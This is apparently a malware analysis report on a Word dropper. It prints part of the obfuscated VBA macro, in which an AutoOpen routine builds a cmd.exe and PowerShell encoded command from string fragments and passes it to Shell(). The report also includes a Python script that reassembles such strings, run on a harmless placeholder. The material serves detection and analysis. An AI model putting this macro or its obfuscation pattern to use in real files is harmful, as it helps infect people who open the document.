Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is a malicious Office document whose VBA project contains an AutoOpen procedure, so the macro runs as soon as the document is opened with macros enabled. AutoOpen calls Shell() with a command that is assembled at run time from dozens of short string fragments returned by helper functions (UBitRZz, KiiqiSjUM, PRPpATiF and others), each of which is padded with no-op Hour ... and Error ... statements under On Error Resume Next so that the real control flow is buried in filler. The fragments visible in the macro preview start a cmd.exe invocation with delayed variable expansion ("mD", "/v:oN", "/c" and "sEt" are all present as separate literals), and the rest consists of base64-looking chunks interleaved with punctuation such as ",", ";", "$", "}" and "'" ; once the apostrophe is removed, the chunk "AG4AZQB3AC0" decodes to the bytes 00 6E 00 65 00 77 00 2D, i.e. UTF-16LE "new-", the encoding used for PowerShell encoded commands. The full command cannot be recovered from the truncated preview, but this construction together with the ClamAV signature Doc.Dropper.Valyria-6668100-0 is consistent with a dropper that downloads and executes a second-stage payload.
Heuristics (6)

- ClamAV: Doc.Dropper.Valyria-6668100-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Valyria-6668100-0.
- VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]: Document contains VBA macro code.
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this generic description does not fit this sample: a VBA project was recovered (macros.bas under Extracted artifacts), so here the marker is redundant with OLE_VBA_AUTOOPEN.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace that Office writes into any document with drawing content; it is not a network indicator and should not be treated as a C2 address.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14202 bytes | 9779615afe179ae64c54b75b5578480d116b6d5927941a35de6823b5a37d3160 |

Script preview (first 1,000 lines of the extracted script; the report's preview is cut off where marked "(truncated)"):

```vb
Attribute VB_Name = "DlLVColizzEq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Hour Sqr(hMJhB)
Hour 40
Error Atn(1)
Error CCur(VIPhP)
Hour 1
Shell# KeyString(YQiHlQDabKGSip + rLEJMjPkO + vbKeyC + BfqwbsiPzNwaK + tJdCwXsPJ) + RksBtsjXCvkLfa + TDtltPwnFH + UBitRZz + KiiqiSjUM + PRPpATiF + wnwiWApmPz + USmDi + DBaDmYW + jmWXDlSD + bkfPGcdQdC + ZGwWjtArm + hwzNpMAwDQ + jwjYHi + lLtmw + UFtnsSIzwcuwYL + FCmEvmhZCtfDwC, 449784644 - 449784644
Hour CDate(BXjnr)
Error 8
End Sub
Attribute VB_Name = "iHJjMWjDQSX"
Function UBitRZz()
On Error Resume Next
Error Str(60383 * 74581 + aFqLTl / 26537)
Error 1085
sHYzaHwjTjj = "mD " + " " + " " + " " + "/" + "v" + ":oN" + " " + " " + " "
Hour CStr(ozlBQr)
Error TimeValue(1)
jKlpHQ = " " + " " + " " + " " + " " + " " + " " + " " + "/c"
Hour 9
Hour 508
bJFviRjvGM = " " + " " + " " + " " + " " + " " + " " + " " + CStr(Chr(LnGTBXAUOVvCP + LJFUYMwQb + 34 + KROPikP + jrzkPnSziDJil)) + " " + " "
Hour CDbl(Chjzmf / qmsts)
Error Int(587)
iiziz = "s" + "E" + "t " + " } " + " "
Hour Hex(PTEsFO - bwfAu)
Error Round(7)
odJilONhX = "=/o" + ",e" + "r-}" + "ell" + "h`e" + "hJA" + "B" + "DA" + "G0" + "AY" + "QA"
Error Cos(100)
Error 48
SwoVLRRkkZL = "'" + "AG4" + "AZ" + "Q" + "B" + "3" + "AC" + "0"
Error FJCrf
Error CDec(33)
Hour TimeValue(EOCcRo + FsIki)
jGpdSozEn = "Ab," + "BiA" + "G" + "oAZ" + "QBj" + "A;" + "Q" + "AI" + "A"
Hour RMBjpu
Error LCase(10409 - HfWZU / aYZAGv + 2002)
Error 770
tCVOjs = "B\A" + "G2" + "AdA" + "A" + "uAF" + "c" + "AZQ" + "Bi" + "AE" + "M"
UBitRZz = sHYzaHwjTjj + jKlpHQ + bJFviRjvGM + iiziz + odJilONhX + SwoVLRRkkZL + jGpdSozEn + tCVOjs
Hour LEQca
Hour CVar(62)
End Function
Function KiiqiSjUM()
On Error Resume Next
Error vOjbSk
Error 8
Error 431
iGiGruBdAN = "Ab" + "A" + "B/" + "A" + "G" + "2Ab" + "gB0"
Error LNNMW
Error TEsaRO
Hour CByte(96)
wYPPWqSo = "AD" + "-" + "A" + "JA" + "B" + "1AF"
Error 6
Hour 99
Hour Sqr(632)
QLLmTkGYOJi = "AAR" + "QA" + "'" + "A" + "Cc" + "AwA" + "B0A" + ";Q" + "Ac" + "AA" + "6AC" + "8A$"
Hour CDate(93077 * nXfiCf)
Hour Tan(3891)
WpqFKU = "," + "Bi" + "A" + ";" + "IAw" + "QBn" + "AGg" + "Ad" + "ABv" + "AG4" + "AwA"
Hour tjcBh
Error Int(jfjHMq)
Hour 319432244
THFzc = "B" + "vA;" + "Y" + "AZQ" + "BjA" + "G" + ",AZ" + "Q" + "B}A"
Error Int(5)
Error 379512492
mJkqfiPJPHj = "G4" + "AZ" + "QBy" + "A;M" + "A$g" + "BjA" + "G" + "8A" + "bQ"
Error Sqr(BhXQU + mLvAFH)
Hour Sgn(859)
Hour Val(jnBLSk)
kvAzBci = "AvA" + "D" + "AA" + "ZAB" + "GA" + "GkA" + "ZQ" + "B3A" + "E" + "AA" + "wA" + "B0A"
Error 256125246
Error Fix(24427 * mqvvK)
iGriOndA = ";Q" + "AcA" + "A" + "6A" + "C8A" + "$," + "Bn" + "A" + "G" + "E"
Error ZBzjXu
Error YhzMq
ikXqGavvMpo = "Aw" + "Q" + "B-A" + "G" + "8A" + "bg" + "Bn"
Error Rnd(WqpEZ)
Error Int(2211)
KwdXXPEi = "AC" + "4" + "Ab" + "g" + "B" + "l" + "A;Q" + "A" + "$," + "B;" + "A"
Hour Cos(mpsFkj + LwTcI)
Hour Str(7557 + dzqBod / rEvjaK / XLlpd)
rlvcijiF = ";c" + "ATQ" + "B5A" + "EA" + "AwA" + "B"
Error CDec(570)
Error Int(428575136)
Error Log(IGbDzL)
dIuBmm = "0A;" + "QA" + "cAA" + "6" + "AC8" + "A" + "$,B" + "rA"
Error mrKww
Error XStoZ
SnGEqAcsvrv = "G" + "4A" + "b," + "B3" + "AGk" + "A" + "bg"
KiiqiSjUM = iGiGruBdAN + wYPPWqSo + QLLmTkGYOJi + WpqFKU + THFzc + mJkqfiPJPHj + kvAzBci + iGriOndA + ikXqGavvMpo + KwdXXPEi + rlvcijiF + dIuBmm + SnGEqAcsvrv
Hour 42
Hour Sin(57135 * FcGSwE + 52046 / lhXUom)
End Function
Function PRPpATiF()
On Error Resume Next
Hour Sqr(16449 - 1338)
Error CDate(4895)
zTUcVcR = "BnA" + "GE" + "AZg" + "By" + "AGk" + "AY" + ",B" + "}AC" + "4" + "Ab"
Hour LCase(1)
Hour Log(6)
Error 198
GDfrld = "," + "B" + "y" + "AGc" + "A" + "$" + ",B ... (truncated)
```
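The preview above shows the pattern the summary describes: every string is split into short literals glued with +, each procedure is padded with no-op Hour/Error statements, and Chr() is applied to a sum of undeclared names plus 34 (an undeclared name is Empty, which VBA treats as 0 in arithmetic, so the result is a double quote). The script below is an added example and is not part of the report or of olevba: it reassembles such strings from olevba-style output by evaluating the assignments the way VBA would. Because the report's preview is truncated and the page does not define KeyString(), it runs on a constructed snippet written in the same style as the macro, with a harmless placeholder command; constructs it does not understand resolve to Empty and are reported rather than guessed.

```python
"""Reassemble the concatenated strings a VBA dropper passes to Shell().

Added example for this report, not the analyzer's or olevba's own code. It
models what the macro relies on: literals glued with "+", and undeclared names
being Empty (0 in arithmetic, "" in concatenation) under On Error Resume Next,
so Chr(a + b + 34 + c) yields a double quote. One assignment per line; only
Chr()/CStr() are understood, anything else resolves to Empty and is reported.
"""
import re

NOISE = re.compile(r"^(Hour|Error)\b", re.I)          # filler statements
SHELL = re.compile(r"^Shell[#$%&!@]?\s+(.+)$", re.I)  # olevba shows "Shell#"
ASSIGN = re.compile(r"^([A-Za-z_]\w*)\s*=\s*(.+?)\s*$")
LITERAL = re.compile(r'^"((?:[^"]|"")*)"$')
CALL = re.compile(r"^(\w+)\((.*)\)$", re.S)
IDENT = re.compile(r"^[A-Za-z_]\w*$")

# Constructed snippet in the style of the extracted macro; the Shell() target
# is a harmless placeholder, not the real sample's command.
SAMPLE_VBA = r'''
Sub AutoOpen()
On Error Resume Next
Hour Sqr(hMJhB)
Error Atn(1)
Shell# "c" + UBitRZz + "x=" + "calc" + Chr(34), 449784644 - 449784644
End Sub
Function UBitRZz()
On Error Resume Next
Error 1085
sHYzaHwjTjj = "mD " + " " + "/" + "v" + ":oN" + " "
jKlpHQ = " " + "/c" + " "
bJFviRjvGM = CStr(Chr(LnGTBXAUOVvCP + LJFUYMwQb + 34 + KROPikP)) + " "
iiziz = "s" + "E" + "t "
UBitRZz = sHYzaHwjTjj + jKlpHQ + bJFviRjvGM + iiziz
End Function
'''


def split_top(expr, sep):
    """Split on sep at parenthesis depth 0, ignoring separators inside quotes."""
    parts, cur, depth, quoted = [], [], 0, False
    for ch in expr:
        if ch == '"':
            quoted = not quoted
        elif not quoted and ch in "()":
            depth += 1 if ch == "(" else -1
        elif not quoted and ch == sep and depth == 0:
            parts.append("".join(cur).strip())
            cur = []
            continue
        cur.append(ch)
    parts.append("".join(cur).strip())
    return parts


def eval_term(term, env, empty):
    """Value of one operand; None stands for VBA's Empty."""
    m = LITERAL.match(term)
    if m:
        return m.group(1).replace('""', '"')
    if term.isdigit():
        return int(term)
    m = CALL.match(term)
    if m:
        fn, arg = m.group(1).lower(), eval_expr(m.group(2), env, empty)
        if fn == "chr" and isinstance(arg, int):
            return chr(arg)
        if fn == "cstr":
            return "" if arg is None else str(arg)
        return None  # Sqr, Atn, ... only ever appear in filler here
    if IDENT.match(term):
        if term.lower() not in env:
            empty.add(term)  # never assigned: Empty
        return env.get(term.lower())
    return None


def eval_expr(expr, env, empty):
    """Evaluate a "+" chain: a sum when every operand is numeric/Empty, else concatenation."""
    vals = [eval_term(t, env, empty) for t in split_top(expr, "+")]
    if all(v is None for v in vals):
        return None
    if all(v is None or isinstance(v, int) for v in vals):
        return sum(v or 0 for v in vals)
    return "".join("" if v is None else str(v) for v in vals)


def analyze(vba_src):
    """Collect assignments, resolve them to a fixpoint, then rebuild the Shell() arguments."""
    env, assigns, shells, noise, autoopen = {}, [], [], 0, False
    for line in (l.strip() for l in vba_src.splitlines()):
        if NOISE.match(line):
            noise += 1
        elif re.match(r"^Sub\s+AutoOpen\b", line, re.I):
            autoopen = True
        elif (m := SHELL.match(line)):
            shells.append(m.group(1))
        elif (m := ASSIGN.match(line)):
            assigns.append(m.groups())
    for _ in range(8):  # a function may be used before its body appears
        before, empty = dict(env), set()
        for name, rhs in assigns:
            env[name.lower()] = eval_expr(rhs, env, empty)
        if env == before:
            break
    commands = [eval_expr(split_top(s, ",")[0], env, empty) for s in shells]
    return {"autoopen": autoopen, "noise_lines": noise, "variables": env,
            "commands": commands, "empty_names": sorted(empty)}


if __name__ == "__main__":
    result = analyze(SAMPLE_VBA)
    print("AutoOpen:", result["autoopen"], "| filler statements:", result["noise_lines"])
    for cmd in result["commands"]:
        print("Shell() argument:", repr(cmd))
    print("treated as Empty:", result["empty_names"])
```

On real olevba output, replace SAMPLE_VBA with the text of the extracted macros.bas. Any name listed under empty_names that is not an obvious throwaway variable (for this sample, KeyString() and the helper functions beyond the truncation point) marks a gap in the reconstruction, and the second-stage cmd.exe substitutions that strip the interleaved punctuation still have to be applied to the result by hand.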